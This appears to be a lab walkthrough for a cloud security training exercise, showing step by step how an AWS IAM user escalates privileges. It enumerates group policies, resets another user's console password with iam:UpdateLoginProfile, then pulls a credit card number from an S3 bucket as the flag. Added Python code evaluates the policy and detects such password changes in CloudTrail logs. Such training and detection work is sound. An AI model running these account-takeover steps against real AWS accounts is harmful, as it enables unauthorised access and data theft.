Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.
aws configure --profile updatelogin
Enumerate your user’s permissions:
aws iam list-groups --profile updatelogin
{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
            "GroupId": "AGPA5M7PA4Z555SJEHAYD",
            "Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}
List policies for this group:
aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin
{
    "PolicyNames": [
        "iam-updateloginprofile-privesc-1701726668596-policy"
    ]
}
Now list the permissions in this policy:
aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin
{
    "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
    "PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListAllMyBuckets",
                    "s3:GetBucketLocation"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }
        ]
    }
}
Viewing the policy returns quite a bit of information, including that you are able to list users in this account:
aws iam list-users --profile updatelogin
{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
            "UserId": "AIDA5M7PA4Z5VBTREZO3L",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
            "UserId": "AIDA5M7PA4Z5TE63N6QMD",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
            "CreateDate": "2023-12-04T21:51:14+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
            "UserId": "AIDA5M7PA4Z5SGDBSVMK6",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
            "UserId": "AIDA5M7PA4Z57CYAWOOIP",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}
This result shows us that there are multiple IAM users:
- Alice
- Bob
- Mark
Which one should we attack?
Well, if we look at the IAM policy attached to our group, we have:
{
    "Action": [
        "iam:UpdateLoginProfile",
        "iam:ListAccessKeys",
        "iam:ListAttachedUserPolicies"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
    ],
    "Effect": "Allow"
},
But then we have an explicit deny:
{
    "Action": [
        "iam:UpdateLoginProfile"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
    ],
    "Effect": "Deny"
}
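That means we cannot UpdateLoginProfile on Mark or Alice: an explicit Deny overrides any Allow, so Mark is blocked even though he appears in the Allow statement, and Alice is not in the Allow list at all. It has to be Bob.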
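The same reasoning can be checked mechanically when reviewing a policy like this one. The following is an added example, not part of the original walkthrough: a small evaluator that applies "explicit Deny wins, otherwise Allow, otherwise implicit deny" to the two statements quoted above. It assumes a single identity policy and ignores Condition, NotAction, NotResource, permission boundaries and SCPs; the function names are illustrative.

```python
import re

# Statements copied from the group policy above (only the two that mention
# iam:UpdateLoginProfile); the shared ARN prefix is factored out.
PREFIX = "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-"
STATEMENTS = [
    {"Effect": "Allow",
     "Action": ["iam:UpdateLoginProfile", "iam:ListAccessKeys",
                "iam:ListAttachedUserPolicies"],
     "Resource": [PREFIX + "Attacker", PREFIX + "Mark", PREFIX + "Bob"]},
    {"Effect": "Deny",
     "Action": ["iam:UpdateLoginProfile"],
     "Resource": [PREFIX + "Attacker", PREFIX + "Mark", PREFIX + "Alice"]},
]
USERS = ["Alice", "Attacker", "Bob", "Mark"]  # from the list-users output


def _matches(patterns, value, flags=0):
    """True if value matches any IAM pattern (* = any run, ? = one char)."""
    if isinstance(patterns, str):
        patterns = [patterns]
    for pattern in patterns:
        regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                        for c in pattern)
        if re.fullmatch(regex, value, flags):
            return True
    return False


def evaluate(statements, action, resource):
    """Return 'Deny', 'Allow' or 'ImplicitDeny' for a single identity policy."""
    decision = "ImplicitDeny"
    for st in statements:
        # Action names are case-insensitive; resource ARNs are matched as-is.
        if (_matches(st["Action"], action, re.IGNORECASE)
                and _matches(st["Resource"], resource)):
            if st["Effect"] == "Deny":
                return "Deny"  # an explicit Deny overrides every Allow
            decision = "Allow"
    return decision


def resettable_users(statements, users):
    """Users whose console password this policy lets the holder overwrite."""
    return [u for u in users
            if evaluate(statements, "iam:UpdateLoginProfile", PREFIX + u) == "Allow"]


if __name__ == "__main__":
    for user in USERS:
        print(user, evaluate(STATEMENTS, "iam:UpdateLoginProfile", PREFIX + user))
```

Run against the statements above, only Bob evaluates to Allow, which is the gap the Deny statement leaves open.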
aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701727836920-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin
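From the defender's side, this step is visible in CloudTrail as an UpdateLoginProfile call whose caller is not the user being changed. The following is an added example, not part of the original walkthrough: the records are constructed, the user names are placeholders, and the field names assume the usual CloudTrail record layout.

```python
# Constructed CloudTrail-style records (not real log data); user names are
# placeholders and the field layout is this example's assumption.
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "ListUsers",
     "eventTime": "2023-12-04T22:01:10Z",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Attacker"},
     "requestParameters": None},
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile",
     "eventTime": "2023-12-04T22:03:41Z", "errorCode": "AccessDenied",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Attacker"},
     "requestParameters": {"userName": "lab-Mark"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile",
     "eventTime": "2023-12-04T22:04:02Z",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Attacker"},
     "requestParameters": {"userName": "lab-Bob", "passwordResetRequired": False}},
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile",
     "eventTime": "2023-12-04T22:09:30Z",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Alice"},
     "requestParameters": {"userName": "lab-Alice", "passwordResetRequired": False}},
]


def cross_user_password_changes(events):
    """Flag UpdateLoginProfile calls where the caller is not the target user."""
    findings = []
    for ev in events:
        if (ev.get("eventSource") != "iam.amazonaws.com"
                or ev.get("eventName") != "UpdateLoginProfile"):
            continue
        identity = ev.get("userIdentity") or {}
        caller = identity.get("userName") or identity.get("arn", "unknown")
        params = ev.get("requestParameters") or {}
        target = params.get("userName", "unknown")
        if caller == target:
            continue  # a user changing their own password is out of scope here
        failed = bool(ev.get("errorCode"))
        findings.append({
            "time": ev.get("eventTime"),
            "caller": caller,
            "target": target,
            "outcome": "failed" if failed else "succeeded",
            # A successful change of someone else's password ranks highest;
            # failed attempts still show probing for a resettable account.
            "severity": "medium" if failed else "high",
        })
    return findings
```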
We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:
https://signin.aws.amazon.com/signin
Once logged in (sometimes it can be finicky), make sure you change to “N. Virginia” as the region. It might default to something else.
From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download. Submit the flag by copy/pasting Joshua Lee’s credit card number.